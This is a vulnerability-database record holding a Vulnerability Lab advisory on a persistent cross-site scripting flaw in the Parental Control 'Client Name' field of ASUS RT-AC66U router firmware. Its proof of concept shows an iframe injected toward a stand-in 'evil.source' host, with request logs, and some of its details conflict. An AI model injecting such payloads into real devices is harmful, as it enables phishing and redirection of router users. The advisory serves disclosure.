{"id": "VULNERLAB:1993", "vendorId": null, "type": "vulnerlab", "bulletinFamily": "exploit", "title": "ASUS WRT-AC66U 3.x - Cross Site Scripting Vulnerability", "description": "", "published": "2018-06-27T00:00:00", "modified": "2018-06-27T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "http://www.vulnerability-lab.com/get_content.php?id=1993", "reporter": "Lawrence Amer [zeroattck@gmail.com] - https://www.vulnerability-lab.com/show.php?user=Lawrence+Amer", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2019-07-10T14:58:33", "viewCount": 110, "enchantments": {"dependencies": {}, "score": {"value": 0.0, "vector": "NONE"}, "backreferences": {"references": [{"type": "threatpost", "idList": ["THREATPOST:07A8466539FBE60F0745BA8985EE73D1", "THREATPOST:87674040C7E713171787C372FB0D24DB", "THREATPOST:A5DA2027FC2C5FE68AC50C92BE182FB8", "THREATPOST:E6F05C49DD277EEC47DDEFB35F8D2818"]}]}, "exploitation": null, "vulnersScore": 0.0}, "sourceData": "Document Title:\r\n===============\r\nASUS WRT-AC66U 3.x - Cross Site Scripting Vulnerability\r\n\r\n\r\nReferences (Source):\r\n====================\r\nhttps://www.vulnerability-lab.com/get_content.php?id=1993\r\n\r\n\r\nRelease Date:\r\n=============\r\n2018-06-27\r\n\r\n\r\nVulnerability Laboratory ID (VL-ID):\r\n====================================\r\n1993\r\n\r\n\r\nCommon Vulnerability Scoring System:\r\n====================================\r\n3\r\n\r\n\r\nVulnerability Class:\r\n====================\r\nCross Site Scripting - Persistent\r\n\r\n\r\nCurrent Estimated Price:\r\n========================\r\n500\u20ac - 1.000\u20ac\r\n\r\n\r\nProduct & Service Introduction:\r\n===============================\r\n802.11ac Dual-Band Wireless-AC1750 Gigabit Router. RT-AC66U supports several operation modes to meet \r\ndifferent requirements. Please select the mode that match your situation. Wireless router mode (Default), \r\nAccess Point(AP) mode or Media bridge. 
In wireless router / IP sharing mode, RT-AC66U connects to the \r\nInternet via PPPoE, DHCP, PPTP, L2TP, or Static IP and shares the wireless network with LAN clients or \r\ndevices. In this mode, NAT, firewall, and DHCP server are enabled by default. UPnP and Dynamic DNS \r\nare supported for SOHO and home users. Select this mode if you are a first-time user or you are not \r\ncurrently using any wired/wireless routers. The ASUS RT-AC66U is a 5th gen dual-band Wi-Fi router, \r\nand the launch platform for the new ASUS AiCloud service. Its speed reaches 1.75Gbps, utilizing the \r\nBroadcom 802.11ac Wi-Fi controller and working in 2.4GHz and 5GHz. The 5GHz band supports up to 1.3Gbps, \r\nexceeding current Gigabit wired transmission and 3X faster than 802.11n. The RT-AC66U offers smooth \r\nlag-resistant multitasking and super-fast streaming, while ASUS AiRadar intelligently strengthens wireless \r\nconnections via powerful amplification, offering future-proof optimized performance. \r\n\r\n(Copy of the Homepage: https://www.asus.com/Networking/RTAC66U/ )\r\n\r\n\r\nAbstract Advisory Information:\r\n==============================\r\nThe Vulnerability Laboratory core research team discovered multiple cross site scripting vulnerabilities \r\nin the official ASUS Wireless Router RT Firmware v3.0.0.4.372_67.\r\n\r\n\r\nVulnerability Disclosure Timeline:\r\n==================================\r\n2018-06-27:\tPublic Disclosure (Vulnerability Laboratory)\r\n\r\n\r\nDiscovery Status:\r\n=================\r\nPublished\r\n\r\n\r\nAffected Product(s):\r\n====================\r\nASUS\r\nProduct: WRT - Wireless Router (UI) 3.0.0.4.372_67\r\n\r\n\r\nExploitation Technique:\r\n=======================\r\nLocal\r\n\r\n\r\nSeverity Level:\r\n===============\r\nLow\r\n\r\n\r\nAuthentication Type:\r\n====================\r\nRestricted authentication (user/moderator) - User privileges\r\n\r\n\r\nUser Interaction:\r\n=================\r\nLow User Interaction\r\n\r\n\r\nDisclosure 
Type:\r\n================\r\nIndependent Security Research\r\n\r\n\r\nTechnical Details & Description:\r\n================================\r\nA cross site scripting vulnerability has been discovered in the ASUS Wireless Router RT Firmware v3.0.0.4.372_67.\r\nThe cross site scripting web vulnerability allows remote attackers to inject their own malicious script code on the \r\napplication-side of the vulnerable function or service module.\r\n\r\nThe cross site scripting vulnerability is located in the `Client Name` input field of the `Parental Control` module. \r\nThe input field for the client name is not securely parsed, which allows an attacker to manipulate the client list on the index \r\nof the module. The request method to inject is POST and the attack vector is located on the application-side. Due to no \r\nreachable cookies in the panel ui, low privileged user accounts are only able to redirect or inject malware to the \r\nclient-side for execution. First the context is saved client-side and after using the apply function the context is \r\nsaved permanently to the image db.\r\n\r\nThe security risk of the client-side cross site scripting web vulnerability is estimated as medium with a cvss \r\n(common vulnerability scoring system) count of 3.0. Exploitation of the client-side web vulnerability requires \r\na privileged web-application user account and low user interaction. 
Successful exploitation of the vulnerability \r\nresults in non-persistent phishing, session hijacking, non-persistent external redirect to malicious sources and \r\nclient-side manipulation of affected or connected web module context.\r\n\r\nRequest Method(s):\r\n[+] GET\r\n\r\nVulnerable Module(s):\r\n[+] Parental Control\r\n\r\nVulnerable Parameter(s):\r\n[+] Client Name\r\n\r\n\r\nProof of Concept (PoC):\r\n=======================\r\nThe cross site vulnerability can be exploited by remote attackers with privileged user account and low user interaction.\r\nFor security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.\r\n\r\n \r\nPoC: Exploitation\r\n<tbody><tr><th title=\"Select all\" width=\"5%\" height=\"30px\"><input id=\"selAll\" onclick=\"selectAll(this, 0);\" \r\nvalue=\"\" type=\"checkbox\"></th><th width=\"40%\">Clients Name</th><th width=\"25%\">Clients MAC Address</th><th width=\"10%\">\r\nTime Management</th><th width=\"10%\">Add / Delete</th></tr><tr><td style=\"border-bottom:2px solid #000;\" \r\ntitle=\"Enable/Disable\"><input id=\"newrule_Enable\" checked=\"\" type=\"checkbox\"></td><td style=\"border-bottom:2px solid #000;\">\r\n<input maxlength=\"32\" style=\"margin-left:10px;float:left;width:255px;\" class=\"input_20_table\" name=\"PC_devicename\" \r\nonkeypress=\"\" onclick=\"hideClients_Block();\" onblur=\"if(!over_var){hideClients_Block();}\" type=\"text\"><img id=\"pull_arrow\" \r\nsrc=\"images/arrow-down.gif\" onclick=\"pullLANIPList(this);\" title=\"Select the device name of DHCP clients.\" \r\nonmouseover=\"over_var=1;\" onmouseout=\"over_var=0;\" height=\"14px;\"><div id=\"ClientList_Block_PC\" class=\"ClientList_Block_PC\">\r\n<a><div onmouseover=\"over_var=1;\" onmouseout=\"over_var=0;\" onclick=\"setClientIP('JIEMING-NB', '50:E5:49:A2:00:F8');\">\r\n<strong>192.168.1.166</strong> ( JIEMING-NB) </div></a><a><div onmouseover=\"over_var=1;\" onmouseout=\"over_var=0;\" 
\r\nonclick=\"setClientIP('JIEMING-MACBOOK', '98:4B:E1:CB:DA:D6');\"><strong>192.168.1.188</strong> ( JIEMING-MACBOOK) </div></a>\r\n<a><div onmouseover=\"over_var=1;\" onmouseout=\"over_var=0;\" onclick=\"setClientIP('JIEMING-PC', 'A8:26:D9:31:2B:49');\">\r\n<strong>192.168.1.161</strong> ( JIEMING-PC) </div></a><a><div onmouseover=\"over_var=1;\" onmouseout=\"over_var=0;\" \r\nonclick=\"setClientIP('A8:26:D9:31:2B:49', 'A8:26:D9:31:2B:49');\"><strong>192.168.1.210</strong> </div></a>\r\n<!--[if lte IE 6.5]><iframe class=\"hackiframe2\"></iframe><![endif]--></div></td><td style=\"border-bottom:2px solid #000;\">\r\n<input maxlength=\"17\" class=\"input_macaddr_table\" name=\"PC_mac\" onkeypress=\"return is_hwaddr(this,event)\" \r\ntype=\"text\"></td><td style=\"border-bottom:2px solid #000;\">--</td><td style=\"border-bottom:2px solid #000;\">\r\n<input class=\"url_btn\" onclick=\"addRow_main(16)\" value=\"\" type=\"button\"></td></tr><tr id=\"row0\"><td title=\"1\">\r\n<input onclick=\"genEnableArray_main(0,this);\" checked=\"\" type=\"checkbox\"></td><td title=\"\"></td>\r\n<td title=\"aa:aa:aa:aa:aa:aa\">aa:aa:aa:aa:aa:aa</td><td><input class=\"service_btn\" onclick=\"gen_lantowanTable(0);\" \r\nvalue=\"\" type=\"button\"></td><td><input class=\"remove_btn\" onclick=\"deleteRow_main(this);\" value=\"\" type=\"button\"></td></tr>\r\n<tr id=\"row1\"><td title=\"undefined\"><input onclick=\"genEnableArray_main(1,this);\" type=\"checkbox\"></td>\r\n<td title=\"\" <iframe=\"\" src=\"evil.source"\">\"<iframe src=\"evil.source</td\"><td title=\"undefined\">undefined</td>\r\n<td><input class=\"service_btn\" type=\"button\" onclick=\"gen_lantowanTable(1);\" value=\"\"/></td><td><input \r\nclass=\"remove_btn\" type=\"button\" onclick=\"deleteRow_main(this);\" value=\"\"/></td><tr id=\"row2\"><td title=\"undefined\">\r\n<input type=\"checkbox\" onclick=\"genEnableArray_main(2,this);\" /></td><td title=\"\"></td><td title=\"undefined\">undefined</td>\r\n<td><input 
class=\"service_btn\" type=\"button\" onclick=\"gen_lantowanTable(2);\" value=\"\"/></td><td>\r\n<input class=\"remove_btn\" type=\"button\" onclick=\"deleteRow_main(this);\" value=\"\"/>\r\n</td></tr></table></iframe></td></tr></tbody>\r\n\r\n\r\n--- PoC Session Logs [GET] ---\r\nStatus: 304[Not Modified]\r\nGET http://event.localhost/nw/_ui/en/ParentalControl.html\r\nMime Type[text/html]\r\n Request Header:\r\n Host[event.localhost]\r\n User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0]\r\n Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]\r\n Referer[http://event.localhost/nw/_ui/en/Advanced_System_Content.html]\r\n Cookie[dm_install=yes; dm_enable=yes; hwaddr=74:D0:2B:64:F0:B0]\r\n Connection[keep-alive]\r\n Upgrade-Insecure-Requests[1]\r\n If-Modified-Since[Thu, 20 Jun 2013 05:45:19 GMT]\r\n If-None-Match[\"31793159796dce1:0\"]\r\n Cache-Control[max-age=0]\r\n Response Header:\r\n Content-Type[text/html]\r\n Last-Modified[Thu, 20 Jun 2013 05:45:19 GMT]\r\n Etag[\"31793159796dce1:0\"]\r\n Connection[keep-alive]\r\n-\r\nStatus: 200[OK]\r\nGET http://event.localhost/nw/_ui/en/evil.source%3C/td \r\nMime Type[text/html]\r\n Request Header:\r\n Host[event.localhost]\r\n User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0]\r\n Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]\r\n Referer[http://event.localhost/nw/_ui/en/ParentalControl.html]\r\n Cookie[dm_install=yes; dm_enable=yes; hwaddr=74:D0:2B:64:F0:B0]\r\n Connection[keep-alive]\r\n Upgrade-Insecure-Requests[1]\r\n Response Header:\r\n Content-Type[text/html]\r\n Server[Microsoft-IIS/7.5]\r\n X-Powered-By[ASP.NET]\r\n Content-Length[1245]\r\n Connection[keep-alive]\r\n\r\n\r\nReference(s):\r\nhttp://event.localhost/\r\nhttp://event.localhost/nw/\r\nhttp://event.localhost/nw/_ui/\r\n\r\n\r\nSolution - Fix & Patch:\r\n=======================\r\nThe issue has been reported in 2016 Q4 (2016-11-09) and was 
finally resolved in 2017 Q3 - Q4 by the asus wrt developer team.\r\n\r\n\r\nSecurity Risk:\r\n==============\r\nThe security risk of the persistent cross site scripting web vulnerability in the asus wrt ui is estimated as medium (CVSS 3.0).\r\n\r\n\r\nCredits & Authors:\r\n==================\r\nLawrence Amer [zeroattck@gmail.com] - https://www.vulnerability-lab.com/show.php?user=Lawrence+Amer\r\n\r\n\r\nDisclaimer & Information:\r\n=========================\r\nThe information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or \r\nimplied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any \r\ncase of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its \r\nsuppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental\r\nor consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface \r\nwebsites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories \r\nor vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails, \r\nphone numbers, conversations or anything else to journalists, investigative authorities or private individuals. 
\r\n\r\nDomains: www.vulnerability-lab.com\t\t- www.vulnerability-db.com\t\t\t\t\t- www.evolution-sec.com\r\nPrograms: vulnerability-lab.com/submit.php \t- vulnerability-lab.com/list-of-bug-bounty-programs.php \t- vulnerability-lab.com/register.php\r\nFeeds:\t vulnerability-lab.com/rss/rss.php \t- vulnerability-lab.com/rss/rss_upcoming.php \t\t\t- vulnerability-lab.com/rss/rss_news.php\r\nSocial:\t twitter.com/vuln_lab\t\t- facebook.com/VulnerabilityLab \t\t\t\t- youtube.com/user/vulnerability0lab\r\n\r\nAny modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. \r\nPermission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by \r\nVulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark \r\nof vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get an ask permission.\r\n\r\n\t\t\t\t Copyright \u00a9 2018 | Vulnerability Laboratory - [Evolution Security GmbH]\u2122\r\n\r\n\r\n\r\n", "category": "", "_state": {"dependencies": 1645340353, "score": 1659797217}, "_internal": {"score_hash": "f7796d6623d27848ae5374a27b81f9e2"}}